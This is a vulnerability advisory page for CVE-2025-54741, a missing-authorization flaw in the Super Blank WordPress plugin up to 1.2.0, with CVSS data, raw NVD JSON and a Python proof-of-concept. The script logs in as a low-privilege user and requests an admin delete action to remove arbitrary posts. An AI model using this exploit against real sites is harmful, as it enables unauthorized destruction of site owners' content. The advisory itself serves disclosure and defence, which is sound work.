Security Vulnerability Report
中文
CVE-2025-54741 CVSS 6.5 MEDIUM

CVE-2025-54741

Published: 2025-12-18 08:15:56
Last Modified: 2026-04-27 17:16:28

Description

Missing Authorization vulnerability in Tyler Moore Super Blank super-blank allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Super Blank: from n/a through <= 1.2.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Super Blank <= 1.2.0 (所有版本)
WordPress (所有受支持版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2025-54741 PoC - Missing Authorization in Super Blank Plugin # Target: WordPress site with Super Blank plugin <= 1.2.0 # Author: Patchstack def exploit_super_blank(target_url, username, password, post_id): """ Exploit the missing authorization vulnerability in Super Blank plugin. This allows any authenticated user to delete arbitrary content. Args: target_url: Base URL of the WordPress site username: Low-privilege WordPress user account password: Password for the user account post_id: ID of the post/page to delete """ session = requests.Session() # Step 1: Authenticate to WordPress login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print('[-] Authentication failed') return False print('[+] Successfully authenticated') # Step 2: Exploit the authorization bypass to delete content # The plugin doesn't properly check permissions before deletion delete_url = urljoin(target_url, f'/wp-admin/admin.php?action=delete&post={post_id}') response = session.get(delete_url) if response.status_code == 200: print(f'[+] Potential deletion attempt on post ID {post_id}') print('[+] Check if the post was deleted via the WordPress admin panel') return True if __name__ == '__main__': if len(sys.argv) < 5: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <post_id>') print('Example: python exploit.py http://example.com/ subscriber password 123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] pid = sys.argv[4] exploit_super_blank(target, user, pwd, pid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54741", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:55.793", "lastModified": "2026-04-27T17:16:28.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Tyler Moore Super Blank super-blank allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Super Blank: from n/a through <= 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/super-blank/vulnerability/wordpress-super-blank-plugin-1-2-0-arbitrary-content-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}